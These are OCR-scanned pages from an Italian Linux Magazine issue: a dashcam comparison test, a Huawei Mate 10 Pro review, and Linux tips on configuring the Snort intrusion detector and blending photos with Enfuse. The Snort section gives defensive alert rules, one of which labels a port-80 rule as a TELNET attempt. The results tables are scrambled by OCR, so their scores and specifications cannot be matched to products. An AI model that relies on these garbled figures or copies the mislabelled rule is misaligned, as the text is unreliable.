velata spesso insufficiente per poter 
riconoscere chiaramente il numero di 
targa. Alcune Dash Cam sono in gra- 
do di filmare anche a risoluzione più 
elevate, ma spesso, nell’uso pratico 
ciò comporta anche degli svantag- 
gi. La maggior parte degli incidenti si 
verifica con cattive condizioni di luce 
e, in questa situazione, si è distinta 
positivamente la Dashcam di Tran- 
scend, in grado di “catturare” nume- 
rosi dettagli anche di notte. Tuttavia 
in tutte le riprese notturne, il rico- 
noscimento della targa si è rivelato 
complicato, poiché riflette parecchio 
la luce dei fari. 


SOLO LE RIPRESE 
IMPORTANTI 


Affinché il conducente possa man- 
tenere entrambe le mani sul volan- 
te, queste videocamere provvedo- 
no a riprendere ininterrottamente, 
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infatti eseguono continuamente dei 
brevi videoclip, che vengono imme- 
diatamente sovrascritti dal filmato 
successivo. Queste riprese in looping 
presentano generalmente la durata 
di un minuto e alcuni modelli consen- 
tono anche di variarla. Per salvare la 
ripresa di un incidente o di una situa- 
zione di pericolo, esistono diverse 
possibilità: premendo un tasto il con- 
ducente potrà salvare l’ultimo loop 0 
avviare e stoppare manualmente una 
ripresa. In caso di incidente però, 
dovendo il conducente occuparsi di 
cose più importanti, diventano d’aiu- 
to le funzioni automatiche della Dash 
Cam. Tramite sensori la videocamera 
rileva la decelerazione di una brusca 
frenata, nonché scosse e vibrazioni 
che avvengono nell’incidente e prov- 
vede a salvare il relativo loop corre- 
dandolo di una protezione da copia 
per impedire di sovrascrivere il clip. 


LE GIUSTE 
PRECAUZIONI 


Con la Dash Cam non potremo però 
filmare tutto e condividere le riprese a 
nostro piacimento. | video sono am- 
messi come prova legale (o nel caso 
venga formalmente disconosciuta, 
come prova libera) in un'eventua- 
le causa intrapresa per accertare la 


COME FUNZIONA 
LA REGISTRAZIONE 
D'EMERGENZA 


EL SENSORE G 
Per prima 
cosa dovre- 
mo imposta- 
re la sensibi- 


cosiddetto 
sensore G. 
L'indicazione 
è relativa al 
sensore di movimento, cioè il tipico acce- 
lerometro che possiamo trovare anche 
nei nostri smartphone. Esso si basa sulla 
forza di gravità: 1 G corrisponde all'attra- 
zione terrestre, 2 G può applicarsi, ad 
esempio, ad una frenata brusca con in- 
chiodata, tenendo presente che in un inci- 
dente possono verificarsi forze di 10 G. 


| Non appena 
\il sensore G 
registra 
‘scosse o Vi- 
brazioni, la 
i, Dash Cam 
(i provvede a 

TIRI eseguire la 
ripresa, proteggendo il clip da un’even- 
tuale sovrascrittura. La videocamera non 
sovrascrive il video e i dati memorizzati 
potranno essere analizzati successiva- 
mente con l'adeguato software. 
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propria responsabilità in un inciden- 
te, ma non si potranno pubblicare sul 
Web video senza oscurare targhe ed 
altre informazioni sensibili. Questo 
è il motivo per cui numerosi video 
spettacolari presenti su Internet e ri- 
presi con le Dash Cam provengono 
dall’estero. 


INFORMAZIONI UTILI 
PER LE RIPRESE 


Una buona Dash Cam, oltre alle im- 
magini, deve consentire di registrare 
anche l’audio, ma qualità e valore di 
utilizzo della traccia audio sono limi- 
tati. Si rivelano molto più importan- 
ti i dati informativi, come velocità di 
marcia, coordinate GPS, nome del 
conducente e data della ripresa, che 
la Dash Cam provvede a inserire nel 
video. | video potranno essere visio- 
nati con un normale media player o 


COME SI 
INSTALLA 
UNA DASH 
CAM? 


Ti sveliamo alcuni trucchi 
per installare una Dash 
Cam anche nella tua au- 
to. Bastano pochi minuti 
per un corretto e solido 
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con il software in dotazione. La Dash 
Cam di Blackvue offre il program- 
ma più esteso, in grado di mostrare 
anche le decelerazioni intervenute 
sul veicolo, la velocità di marcia e 
l'itinerario percorso. Se un veicolo 
viene utilizzato da più persone, al- 
cune Dash Cam, come ad esempio 
la Blaupunkt, consentono di regi- 
strare il nome del conducente. Sul- 
la BP 3.0 FHD quest'opzione non 
è riconoscibile immediatamente, a 
causa di un errore di traduzione, in- 
fatti la voce “Driver ID” non è sta- 
ta tradotta correttamente, come 
“nome conducente”. 


UN AIUTO NEL TRAFFICO 


Tutti i modelli, ad eccezione del- 
la Blackvue, possono, in caso di 
bisogno, funzionare a batteria, e 
quindi, nel caso in cui l’elettronica 


dell'automobile non dovesse più 
funzionare a causa di un incidente, 
le Dash Cam sarebbero in grado di 
continuare a filmare. Oltre alle ri- 
prese video, alcuni modelli si rive- 
lano d’aiuto anche per circolare nel 
traffico. Il Transcend, ad esempio, 
emette un segnale acustico, quan- 
do rivela che la distanza di sicurez- 
za sia troppo ravvicinata. La Gar- 
min Dash Cam 55 invece rende più 
semplice l’usabilità, grazie ad un 
ottimo sistema di comandi vocali. 
Inoltre, alcune Dash Cam possono 
essere gestite tramite un’app del- 
lo smartphone. Il conducente avrà 
quindi la possibilità di memorizza- 
re i video sullo smartphone e di vi- 
sionare attraverso la WLAN immagini 
live riprese dalla videocamera. Poi- 
ché la Blackvue non è dotata di di- 
splay, le immagini live potranno esse- 
re visualizzate solo attraverso un’app 


PULIRE 

IL PARABREZZA 

Prima di applicare una Dash Cam, prov- 
vediamo a pulire accuratamente il vetro 
del parabrezza, per consentire al sup- 
porto di aderire meglio al vetro. 


per avere una visione ottintale della 
strada, dobbiamo posizionare la Dash 
Cam al centro del vetro sotto lo spec- 
chietto retrovisore. Tramite lo snodo 
o la rotella, possiamo regolare in 
modo preciso l'angolo di visuale. 


montaggio e guidare 
in piena sicurezza! 


@® Linux Magazine 


ee es0osssce06eso 


0 è 0000000000006 006 


dello smartphone. Nelle prove, la 
mancanza del display ha reso un po’ 
complicata la corretta configurazione 
della Dash Cam. 


QUALE METTO 
NEL CARRELLO? 


Dal test emerge chiaramente che, 
volendo acquistare una buona Dash 
Cam, occorre spendere oltre 100 
euro. Il prezzo della vincitrice del 
test, la TrueCam A7, è di 159 euro, 
ma la videocamera consente di filma- 
re con buona qualità sia di giorno che 
di notte e inoltre, offre anche nume- 
rose funzioni extra. A tutto questo si 
aggiunge la possibilità di memorizza- 
re tutte le informazioni più importan- 
ti. Con 48 euro è comunque possibile 
acquistare la Rollei CarDVR-71, vin- 
citrice del rapporto qualità/prezzo e 
in grado di fornire video dignitosi. 


ORR 


impedisca la visione del traffico, 
facciamo passare dal lato del 
passeggero. 
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DASHCAM 
A CONFRONTO 


RISULTATI DEL TEST 


Quanto è buona la qualità dell'immagine? 


Prova visiva delle immagini / con veloci scene di movimento 


Risoluzione max. / Precisione dei dettagli /scalettatura / visione 


del colore / rumore digitale / angolo di ripresa 


Prova visiva: riprese con luce scarsa 


Quanto è buona la qualità dell'audio? 
Prova uditiva 


Quali funzioni extra offre la Dashcam? 
Autonomia batteria 


Informazioni sul display: funzione per riprese / tempo rimanente 


per riprese / livello carica batteria / data / orario 


Monitor: touchscreen / dimensioni (diagonale) / luminosità 


GPS 
Connessioni 


Idoneità della camera per riprese dall'auto? 
Peso inclusa batteria / Larghezza x Altezza x Lunghezza 


Accessori in dotazione per il fissaggio 


Funzioni disponibili per le riprese 


Istruzioni / lingua del menu / menu della fotocamera / usabilità - 


Gestibile via App / con comandi vocali 


Tempo di attesa, prima che la camera sia pronta all'uso dopo 


l'attivazione 
Bonus 


@® Linux Magazine 


TRUECAM 
ATS 
Prezzo: 159 Euro 


La A7s ha offerto la migliore 
qualità d'immagine, sia per ri- 
prese diurne che notturne. Of- 
fre, inoltre, pratiche funzioni 
extra, come un allarme per la 
velocità. Per l’analisi dei dati 
informativi, targa e il nome del 
conducente possono essere 
inseriti nel filmato. 


+ Buona qualità d'immagine, 
HDMI, tastiera illuminata. 


= | Case piuttosto grande. 


Scheda di memoria: Micro SDHC 
Risoluzione per video / foto: 
2,99 Megapixel / 12,96 MP 


La migliore qualità d'immagine 


immagine abbastanza nitida, buona fedeltà 
dei dettagli, colori ok / immagini fluide e 
abbastanza nitide 


2304 x 1296 (30p) / elevata / buona / 
soddisfacente / non fastidioso / un po' 
piccolo 

lieve rumore digitale, numero targa 
riconoscibile difficilmente con difficoltà 


Audio accettabile 
audio un po' metallico, qualità vocale buona 


Dotazione buona 
29 minuti 


si/si/si/si/si 

no / 6,8 cm / buona 

si 

HDMI, USB 

Supporto con ventosa o incollabile 
95 grammi /10,3x5,1x4,0cm 


ventosa per parabrezza, supporto incollabile 
per parabrezza - 


video, immagini, Loop (con memorizzazione 
manuale e automatica, durata regolabile) 


molto dettagliate, di facile comprensione / 
italiano / molto intuitivo / confortevole 


no / no 
4,7 secondi 


informazioni nel video 


LAUN 2560x 1440 (30p) / elevata / buona / 


t:XIN sfocate, numero targa riconoscibile con 


audio limpido e pulito 


3,2 31 minuti 


74 | Solo supporto incollabile 
6,8 60grammi/5,6x4,1x3,5cm 
s(iXi} supporto incollabile per parabrezza 


dettagliate solo in Intemet, di comprensione 
un po' difficile / italiano / intuitivo / 
confortevole 

no/si 


26 7,5secondi 


informazioni nel video 


GARMIN — 
DASH CAM 55 


Prezzo: 228 Euro 


Le riprese della Garmin non 
possono essere avviate ma- 
nualmente, poiché registra 
sempre in automatico, con 
buona qualità d'immagine. Un 
punto di forza sono i buoni co- 
mandi vocali e poter accedere 
ai clip memorizzati attraverso 
lo smartphone. 


+ Compatta, con comandi vo- 
cali per un’usabilità sicura. 


Riprese solo in modalità au- 
tomatica. 


Dtranscend air 


TRANSCEND 
DRIVEPRO 230 
Prezzo: 163 Euro 


La Transcend, oltre a poter es- 
sere comandata tramite tasti, 
può essere gestita dallo smar- 
tphone. Nei filmati notturni, la 
qualità dell'immagine è stata 
abbastanza buona, mentre in- 
vece si rivela comparativamen- 
te scadente con luce diurna. 


+ Gestibile via App, batteria di lunga 
autonomia in caso di necessità. 


Solo istruzioni brevi, manca un 
dispositivo di arresto perle riprese. 


Scheda di memoria: Micro SDHC 
Risoluzione per video / foto: 
3,69 Megapixel / 3,69 MP 


84 | Qualità d'immagine buona 


immagini abbastanza nitide e ricche di 
dettagli / immagini con lieve effetto flou 


soddisfacente / non fastidioso / ampio 


difficoltà 


video, foto, acceleratore, Loop (memorizzazio- 
ne automatica, durata regolabile) 


RISULTATO DEL TEST laflafiaatà: HAHA 


TA 


50 


02 


Scheda di memoria: Micro SDXC 
Risoluzione per video / foto: 
2,07 Megapixel / 2,07 MP 


Riprese notturne di buona qualità 5,8 


immagini scure, con rumore digitale, nitidezza ‘6,0 
buona e riproduzione ricca di dettagli / 

immagini un po' scattose, nitidezza 
accettabile 


1920x1080 (25p 0.30p) / soddisfacente / (3,8 
buona / sufficiente / fastidioso / ampio 


numero targa difficilmente riconoscibile, 
rumore digitale 


audio potente e limpido 70 


| Poche informazioni sul display 7,2 | Lunga autonomia 
34. 68 minuti 5,0 
si/no/si/no/ no 50. si/no/si/si/si 74 
no / 5,1 cm / buona 4,6 no/6,3cm/ sufficiente 46 
i si 
re: WLAN, USB 64. WLAN,USB 64 


Solo supporto a ventosa 64 
81 grammi / 6,3x7,0x3,5cm 
supporto a ventosa per parabrezza 


video, foto, acceleratore, Loop (memorizzazio- 
ne manuale e automatica, durata regolabile) 


dettagliate solo su Intemet, di facilissima 
comprensione / italiano / intuitivo / 
scomoda 


si/no 50 
2,6 secondi 6,8 
informazioni nel video 0,2 


Kok 


coeescecocos 
scese e0eo 
e peso 
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BLACKVUE 
DR650S-2CH 
Prezzo: 329 Euro 


La Blackvue si rivela la candida- 
ta più costosa, ma in compen- 
so è in grado di filmare anche 
posteriormente grazie ad una 
camera supplementare, riu- 
scendo così a documentare an- 
che i tamponamenti. Per l’uso 
pratico, la videocamera può es- 
sere gestita solo tramite App. 


+ Con camera extra posteriore, 
software buono. 

Usabilità solo via App, 

supporto solo incollabile. 


BLAUPUNKT 
BP 3.0 FHD GPS 
Prezzo: 115 Euro 


Il modello di Blaupunkt si rivela 
purtroppo mediocre in tutte le 
funzioni. La qualità dell'immagi- 
ne è perlomeno nella media di 
quelle offerte dalle concorrenti, 
ma l’usabilità potrebbe essere 
più semplice. Malgrado tutto, si 
distingue per un software analiti- 
co molto esteso. 


Software buono, uscita HDMI. 


Usabilità complicata, qualità 
immagine mediocre. 


ROLLEI 
CARDVR-310 
Prezzo: 202 Euro 


La CarDVR 310 si distingue 
per una buona qualità co- 
struttiva, ma la sua qualità 
d'immagine è solo medio- 
cre. Pochissimi i dati infor- 
mativi memorizzabili: solo 
data e ora. L'usabilità invece 
si rivela molto agevole. 


+ Robusto case in metallo, 
usabilità semplice. 


= | Riprese mediocri. 


ROLLEI 
CARDVR-71 
Prezzo: 47 Euro 


Il modello economico delle due 
videocamere Rollei si è piazza- 
to all'ultimo posto a causa del- 
la scadente qualità d'immagi- 
ne con tutte le condizioni di lu- 
ce e i video sfocati sono quindi 
quasi inutilizzabili. Anche l'usa- 
bilità complicata ha impedito di 
assegnare un voto migliore. 


+ Compatta e leggera, 

uscita HDMI. 
i Qualità d'immagine scadente, 
usabilità complicata. 


Scheda di memoria: Micro SDXC Scheda di memoria: Micro SDXC Scheda di memoria: Micro SDHC Scheda di memoria: Micro SDHC 

Risoluzione per video / foto: Risoluzione per video / foto: Risoluzione per video / foto: Risoluzione per video / foto: 

2,07 Megapixel / 0 MP 2,07 Megapixel / 12 MP 2,07 Megapixel / 4,06 MP 2,07 Megapixel / 12 MP 

Immagine accettabile con luce diurna 12 Immagine mediocre (8.7 Immagine mediocre 112.7 Immagine sufficiente 3,2 


immagine poco nitida, dettagli scarsi / leggero ‘70 immagini piuttosto scalettate, saturazione colore (5,0. immagini con pochi dettagli / con effetto floue ‘8,0. intenso rumore digitale / immagini con effetto ‘5,2 


effetto flou, per il resto ok bassa, scure, rumore digitale / immagini un po' sfocate, luminosità non uniforme flou e sfocate 

sfocate 
1920 x 1080 (25p o 30p) / un po' scarsa / EVA 1920x1080 (25p,30p) / un po'scarsa / si, 54 1920x1440(30p) / soddisfacente / nessuna / 1280x 720 (25p 0 30p) / un po'scarsa;/ 
nessuna / buona / non fastidioso / ampio fastidiosa sufficiente / non fastidioso / molto buona / fastidioso / un po' piccolo nessuna / buona / fastidioso / piccolo 

ampio 
molto scure, intenso rumore digitale, numero 4,0 numerotarga non riconoscibile, riprese un po' ‘40. numerotarga non riconoscibile, fastidioso 4,0. numerotarga non riconoscibile, riprese un po" 
targa riconoscibile con difficoltà scure rumore digitale scure 
Audio mediocre 18. Audio sufficiente L.t1]0) Audio sufficiente (1118. Audio mediocre 50 
audio un po' cupo 6,0 audiosottileenasale confruscii 40 audioconintenso fruscio, pulito ma poco 40 audioconievifruscii fastidiosi, cupo 50 

potente 
[IT La più lunga autonomia nel test 86 _ Display mediocre 72 Manca GPS 36 

O minuti i} 72 minuti 5,2 58 minuti 46 20minuti 8 
no /no/ no / no / no i si/si/si/si/si agi si/no/si/si/sì si/no/si/si/si 
manca (Xi no/7,1cm/ buona 6,6 no/5,9cm/ soddisfacente 4,8. no/5,8cm/ soddisfacente 48 
si si si [100 rio ii 
WLAN HDMI, USB 44. HDMI,USB 
Solo supporto incollabile 7. Solo supporto a ventosa (A Solo supporto a ventosa 70 
120 grammi / 11,8x3,6x4,4 cm 6,4 105grammi/8,1x6,5x4,2cm 75 grammi / 5,7x3,0x5,8 cm Xi 54 grammi /6,2x6,8x2,7 cm 90 


supporto incollabile per parabrezza 5,0. ventosa per parabrezza 5,0 ventosaperparabrezza 5,0. ventosa per parabrezza 50 
Tempo di avvio più lungo nel test (1742 Tempo di avvio più veloce nel test Numerose modalità di ripresa (‘11 Offre solo istruzioni brevi 5,6 
video, Loop (con memorizzazione manuale e video, foto, Loop (memorizzazione automatica, video, foto, acceleratore, rallentatore, Loop (con R&{IXi}} video, foto, Loop (memorizzazione manuale e 
automatica, durata regolabile) durata regolabile) memorizzazione manuale e automatica, durata automatica, durata regolabile) 

regolabile) ; 
dettagliate solo su intemet, di facile molto dettagliate, di facile comprensione / dettagliate su Intemet, di facile comprensione / (5,0... dettagliate solo su Intemet, di facile 44 
comprensione / italiano / molto intuitivo / italiano / un po' confuso / un po' scomoda italiano /intuitivo / un po' scomoda comprensione / italiano / un po' confuso / un 
comandabile solo via App po' scomoda 
si/ no 50 no/no no / no 1 no/no 
22,0 secondi AM 1,7 secondi 4,1 secondi 3,8 3,8secondi 4,2 
informazioni nel video, camera posteriore 0,8 informazioni nel video, software buono informazioni nel video 0,2 


KAATAI VASTO LaPaLa 90 KAT 


Linux Magazine Hi 31 


| 
| 
i 
| 
| 
i 
| 
| 


Mate 10 Pro: 
bello e funzionale I 


La nuova punta di diamante di casa Huawei ha tutte le carte in regola 
per rivoluzionare il futuro degli smartphone. Ecco perché 


iti gli anni a primavera, i produtto- 
ri presenti al Mobile World Congress 
annunciano con grande entusiasmo 
le novità dei propri smartphone. Tuttavia, ri- 
spetto alla marea dei dispositivi presentati in 
autunno, la ribalta del MWC diventa un sem- 
plice siparietto, poiché Apple, Google, LG e 
affini propongono in continuazione smart- 
phone al top. Come è possibile quindi attirare 
l’attenzione? Huawei si è spremuta le meningi 
e il Mate 10 Pro dovrebbe rivelarsi veramente 
intelligente, attribuendosi a pieno diritto il ter- 
mine smartphone. Si tratta solo di una trovata 
di marketing o il dispositivo offre veramente 
qualcosa di smart? 


n 
i 
LIT P. 


LA FOTOCAMERA 


Il Huawei Mate 10 Pro scatta le foto 
con una camera duale dotata di due 
obiettivi. Uno dei due lavora con un 
sensore da 12 Megapixel per le clas- 
siche istantanee a colori. Per questa 
funzione si affida ad un luminoso dia- 
framma 1,6. Sul retro del secondo 


obiettivo trova posto un sensore per le foto in bianco e nero con una risolu- 
zione di 20 Megapixel ed un'apertura di diaframma 1,6. Il software fotogra- 
fico del Mate 10 Pro provvede ad armonizzare i segnali video di entrambi gli 
obiettivi, che consentono di zoomare senza perdite di nitidezza e di esegui- 
re primi piani con effetti per la profondità di campo. 

Con un utilizzo normale, il Mate 10 Pro, anche con luce scarsa è in grado di 

| scattare foto di una qualità migliore rispetto agli smartphone top di gamma 
i di produttori leader. Nelle prove, la fotocamera si è rivelata deludente con 
le foto di soggetti inanimati, come chiaramente visibile nella foto della 
bambola. La colpa di questa imperfezione è imputabile al software, poiché 
l'automatismo ha spesso selezionato impostazioni inadeguate. 


DISPLAY NITIDO 
E SPIGOLOSO 


Negli ultimi anni, Huawei si è fatta conosce- 
re per i suoi smartphone della serie P, ma la 
punta di diamante di questo produttore sono 
sempre stati i dispositivi serie Mate. Già il pre- 
decessore Mate 9 si distingueva per un di- 
splay XXL, un hardware veloce e una potente 
batteria di lunga autonomia. Huawei conti- 
nua ad adottare questa formula di successo 
anche con il Mate 10 Pro, che offre tecnolo- 
gia e design più attuali. Anziché un normale 
schermo LCD, l'utente potrà ora godere di 
un luminosissimo display OLED da 6 pollici, 
racchiuso in un case dalla forma allungata nel 


formato 18:9, analogamente alla serie Gala- 
xy di Samsung e all'iPhone X. Anche il Mate 
10 presenta ora la parte posteriore in vetro, 
come i modelli top di gamma di Samsung e 
Apple. Innovazione intelligente: grazie ad un 
adattatore HDMI, il Mate 10 Pro può essere 
collegato ad un monitor in alternativa a un 
PC, senza necessità di una docking station. 


MOSTRO D’INTELLIGENZA 
ANCORA IN FASCE 


Relativamente alla velocità di lavoro, il nuovo 
processore Kirin 970 non mostra alcun punto 
debole. Ancora più interessante della velocità 


HUAWEI 


si rivela però il chip extra, riservato esclusiva- 
mente all’intelligenza artificiale. Analogamente 
ad un bambino, l’AI del Mate 10 Pro dovrebbe 
imparare quotidianamente qualcosa di nuovo. 
Ad esempio, tenere sotto controllo l'autonomia 
della batteria e ricordare prontamente all’uten- 
te di ricaricare lo smartphone prima d’intra- 
prendere un lungo viaggio. Ad ogni buon 
conto, l'autonomia della batteria di 14 ore si 
rivela senz'altro al top e decisamente miglio- 
re di quella offerta da Samsung o Apple. L'in- 
telligenza artificiale si rivela d’aiuto fornendo 
anche un traduttore per una dozzina di lingue 
straniere, utilizzabile pure off-line e inoltre offre 
la possibilità di poter riconoscere i soggetti in 
una foto: nell'uso pratico, questa funzione si è 
rivelata affidabile. Questa caratteristica non si 
rivela però rivoluzionaria, poiché offerta anche 
da altri produttori tramite app. 


FOTOCAMERA: 
PREGI E DIFETTI 


Nel Mate 10 Pro, anche il comparto fotografico 
si rivela interessante, poiché offre una camera 
duale realizzata da Leica. Un sensore a colori 
da 12 Megapixel e una risoluzione di 20 MP 
per foto in bianco e nero, consentono di ese- 
guire inquadrature nitide con un doppio zoom 
e di ottenere ritratti, con possibilità di inserire 
effetti per la profondità di campo. Il diaframma 
si rivela più luminoso rispetto alla concorrenza. 
L'intelligenza artificiale dovrebbe essere in gra- 
do di selezionare anche le corrette impostazio- 
ni della fotocamera per le rispettive inquadra- 
ture. In alcune situazioni, tutto ha funzionato 
perfettamente ma, in altre, i risultati sono stati 
scadenti. Utilizzando ad esempio elevati ISO, è 
incomprensibile che le foto siano talvolta risul- 
tate nebbiose e con intenso rumore. Funzioni 
analoghe sono offerte anche da altri smart- 
phone top di gamma, prive dell'etichetta che 
attesta la presenza dell’intelligenza artificiale. 
Sotto questo aspetto, Huawei dovrà apportare 
migliorie rilasciando un update. 


TIRIAMO LE SOMME 


Huawei ha racchiuso una batteria record in un 
elegante case di vetro con un sottile display 
OLED. Grazie a questo look elegante, Huawei 
recupera terreno nei confronti di Samsung. 
Anche relativamente alla fotocamera, l’azien- 
da cinese ha fatto dei progressi, ma il software 
necessita di una messa a punto. Riguardo al 
chip per l'Al, il suo potenziale al momento non 
si rivela estremamente affidabile. 


Schermo: luminosità / contrasto / fedeltà cromatica 
Qualità foto con luce diuma 
Qualità foto con luce scarsa senza flash / con flash / con foto di eventi sportivi (voto) 


Qualità foto scattate con fotocamera frontale 
Hi; È ia/N 


Facilità d'uso? 
Velocità di usabilità e di lavoro 
N Possibilità di sblocco biometrico 
Quanto è itloneo per un uso quotidiano? 
Autonomia batteria: utilizzo intensivo / utilizzo normale / capacità / ricarica rapida 


Galerie DA 


Cin 
Stellingen 


| Peso / spessore / rapporto tra display e comice 


Test di caduta / resistenza ai graffi della scocca / del displa) 


impermeabilità 


f Quanto è valido in chiamata/ricezione? 


Uso del telefono: Test uditivo / vivavoce / HD Voice qualità SE te qualità abbastanza buona / si 
| Qualità di ricezione con UMTS / LTE.800 / LTE 1800 (Voti 14/80/71. 
Qualità della connessione per Internet? 


— { Velocitàmax possibile con connessione mobile __————_É_—É——kkk=c12.603Mbps(LE);WAN20 MU 
iN RISULTATO DEL TEST 


GRANA 


d w a r 


URAS 
NUOVO CHIP IA: 
NEONATO, MA DOTATO 


IL processore Kirin 970 viene realizzato diret- 
tamente da Huawei e si tratta di una CPU oc- 
ta-core, con dodici core grafici e un proces- 
sore ad hoc per l'intelligenza artificiale. 
Quest'ultimo componente è collegato con il 
software del sistema e con le app preinstal- 
late. Le funzioni principali sono riportate qui 
di seguito: 


RICONOSCIMENTO 

DEL SOGGETTO 

Gatto con occhioni o muffin al cioccolato? 
Nella modalità ritratto, il Mate 10 Pro ricono- 
sce automaticamente la maggior parte dei 
soggetti (14 modalità). IL sistema provvede 
poi a selezionare in una frazione di secondo 
le migliori impostazioni per l'immagine. Gra- 
zie ad un'estesa raccolta di dati, la percen- 
tuale di riconoscimento dei soggetti risulta 
elevata. 


LA TA MONITORA LA BATTERIA 
L'attuale sistema operativo Android 8.0 Oreo 
con interfaccia EMUI, integra anche l'intelli- 
genza artificiale. Il sistema tiene sotto con- 
trollo l'utilizzo giornaliero della batteria, 
provvede a ricaricarla velocemente, regolan- 
do la potenza del sistema in background. 


TRADUZIONI GRAZIE ALLA IA 

Il traduttore fotografico di Microsoft è pre-in- 
stallato. L'app della fotocamera provvede a 
scansionare il testo e a convertire anche gli 
ideogrammi cinesi in un italiano comprensi- 
bile. L'AI lavora in modalità offline diretta- 
mente sullo smartphone e non necessita di 
connessione a Internet. 


HUAWEI MATE 10 PRO 
Prezzo: 849 € 


luminoso 106: 5 co) / un po'basso 2298:1 / elevata 94% 
aberrazione cromatica con soggetti ricchi di contrasto 


rumore digitale (3,6) / imperfezioni sui bordi (5,0) / 
soggetti in movimento leggermente sfocati (6,0) 
nitidezza buona, lieve rumore digitale 


Semplice, compatto e velocissimo 


molto elevata e molto veloce 
numerose, ad esempio il sensore per impronta digitale 


Batteria potente, impermeabile 

lunga: 14:00 h / lunga: 43:26 h / 3900 mAh / 

si (certificazione 

un po' elevato: 178 g / sottile: 8,8 mm / elevato: 81% 
si / molto elevata / si 

Qualità vocale e ricezione buona 


LTE e WLAN ‘lasso 101 i) 


HAHA 


MENETIN 
LERPIRLIAV) 
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VU? Tips & Tricks 


E Trucchi e consigli per usare subito GNU/Linux come un vero esperto. 
Scoprire le strategie e gli strumenti giusti per trovare una soluzione rapida a tutti 
i problemi e sfruttare appieno le potenzialità del sistema e delle applicazioni 
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CONTROLLIAMO 
LA RETE LOCALE 


sì Lo strumento più comune per 

I difendere il proprio PC è il fi- 
rewall. Il problema è che da solo non 
basta: è utile per impedire delle con- 
nessioni, il problema è capire quali 
connessioni debbano essere bloc- 
cate e quali no. Ad esempio, un pro- 
gramma come Fail2Ban è un buon 
modo per identificare tentativi di 
brute force delle password e bloc- 
care le connessioni che li stanno fa- 
cendo. Ma quello è solo uno degli 
attacchi che un sistema può subire 
quando è esposto a Internet. Per ri- 
levare le intrusioni è necessario un 
NIDS, un programma capace di 
analizzare il flusso di rete e scoprire 
in tempo reale tentativi di accesso 
remoto, ad esempio tramite buffer 
overflow, shelleode, o scansione 
delle porte. Il più famoso in circola- 
zione è Snort, semplice da configu- 
rare e molto leggero. Definendo al- 
cune regole in un file di testo è 
possibile stabilire cosa tenere sotto 


controllo: il programma analizzerà 
poi automaticamente tutto il traffico 
alla ricerca di pacchetti di rete inu- 
suali, che possano suggerire una 
potenziale minaccia. Il modo più 
semplice per installare Snort su un 
sistema di tipo Debian è usare il si- 
stema dei pacchetti con il comando 
sudo apt-get install snort. Durante 
l'installazione viene richiesto di indi- 
care quali indirizzi considerare come 
parte della propria rete locale. Que- 
sto è utile per distinguere i dispositi- 
vi della LAN da tutti gli altri, nel caso 
si vogliano considerare i primi come 
più affidabili e quindi porre sotto un 
regime di controllo più stretto sol- 
tanto i secondi. Il file di configura- 
zione è /etc/snort/snort.conf. Si 
possono indicare delle specifiche 
porte su cui controllare i servizi. Se il 
proprio server SSH non è in ascolto 
sulla porta 22, sarà opportuno mo- 
dificare questo valore nell'apposita 
riga. Dopo avere modificato la con- 
figurazione, è opportuno provare 
per assicurarsi che funzioni. Lo si 


istema:tuessibile dt orittvazione delle sSntrustoni nelta rete 


BM Fig. 1 © Ecco l'analisi effettuata da Snort 


può fare con sudo snort -T -c /etc/ 
snort/snort.conf. Se tutto va bene, 
dopo una serie di test il programma 
dovrebbe avvisare di aver validato 
correttamente il file. L'altro file da 
modificare è /etc/snort/rules/lo- 
cal.rules, che contiene le varie re- 
gole per stabilire ciò che si vuole 
tenere sotto controllo. Inizialmente 
dovrebbe essere vuoto, ma inseren- 
do le righe: 


alert tcp any any -> $HOME NET 
21 (msg: "FTP connection 
attempt"; sid:1000001; rev:1;) 
alert icmp any any -> $HOME_NET 
any (msg:"ICMP connection 
attempt"; sid:1000002; rev:1;) 

alert tcp any any -> $HOME_NET 
80 (msg: "TELNET connection 
attempt"; sid:1000003; rev:1;) 


Si impone a Snort di prendere nota 
per ogni connessione verso le por- 
te 21 e 80 e per tutte le richieste 
ICMP (cioè i ping inviati al sistema). 
Aggiornate le regole, è necessario 
riavviare Snort (sudo systemcti re- 
start snort.service). Nel giro di 30 
secondi il servizio dovrebbe essere 
completamente riavviato caricando 
le nuove regole che sono state spe- 
cificate. Nel file /var/log/snort/alert 
vengono indicati tutti gli alert dovuti 
alle regole specificate: tenendo sot- 
to controllo questo file è possibile 
vedere in tempo reale le potenziali 
minacce per la sicurezza. Ad esem- 
pio, facendosi inviare una email ap- 
pena si rileva una connessione con- 
siderata pericolosa. Per visualizzare 
i file di log si deve cercare l'ultimo 
file del tipo /var/log/snort/snort. 


23 Aiuto v!| Valori predefiniti 


«> E: RE Miscela di esposizione - Doppia es... 


EB Fig. 2 © IL risultato della fusione di più immagini 


log: il programma ne crea diversi, 
ciascuno termina con un timestamp 
dell'orario in cui Snort è stato avvia- 
to. Questi file possono anche essere 
analizzati con Wireshark per avere 
maggiori possibilità di identificare 
eventuali attacchi. 


UNIAMO 
PIÙ IMMAGINI 


Le macchine fotografiche, 

siano esse analogiche o digi- 
tali, hanno una gamma dinamica 
inferiore rispetto all'occhio umano. 
Ciò significa che riescono a perce- 
pire meno gradi di luminosità. Nor- 
malmente, questo non è un proble- 
ma, perché nessuno nota la 
differenza, ma in casi nei quali la 
luminosità è davvero importante, 
questo dettaglio può diventare 
fondamentale. Ad esempio, quan- 
do si fotografa un paesaggio con 
un'ampia porzione di cielo, magari 
durante alba o tramonto. In quei 
casi la gamma del sensore fotogra- 
fico non è sufficiente per esporre 
correttamente tutta la scena, col 


risultato che alcune zone risulte- 
ranno troppo scure e altre troppo 
chiare. L'unica soluzione consiste 
nello scattate diverse foto con di- 
verse esposizioni allo stesso sog- 
getto e poi riunirle in un'unica im- 
magine tenendo soltanto le zone 
che risultano correttamente illumi- 
nate. Esistono vari programmi per 
realizzare questa sovrapposizione 
in modo automatico, e uno dei mi- 
gliori è Enfuse, il quale dispone di 
diverse interfacce grafiche come 
Kipi Plugins. La si può avviare da 
terminale con il comando expo- 
blending. Si tratta di una procedu- 
ra guidata con più passaggi. Nella 
prima schermata vengono indicati i 
due programmi necessari per il 
funzionamento: enfuse e align_ 
image_stack. Andando al passag- 
gio successivo, una semplice inter- 
faccia permette di inserire delle 
fotografie nella lista. L'interfaccia 
contiene una serie di suggerimenti, 
comunque l'ideale è avere almeno 
3 immagini dello stesso soggetto, 
ciascuna con un'esposizione un 
po' diversa. Non è fondamentale 


| | Da elaborare 


Nome del file 


DSCI9ISGOJPG 


| ER Impostazioni di Enfuse 


CL) Livelli automatici 


Livelli: 


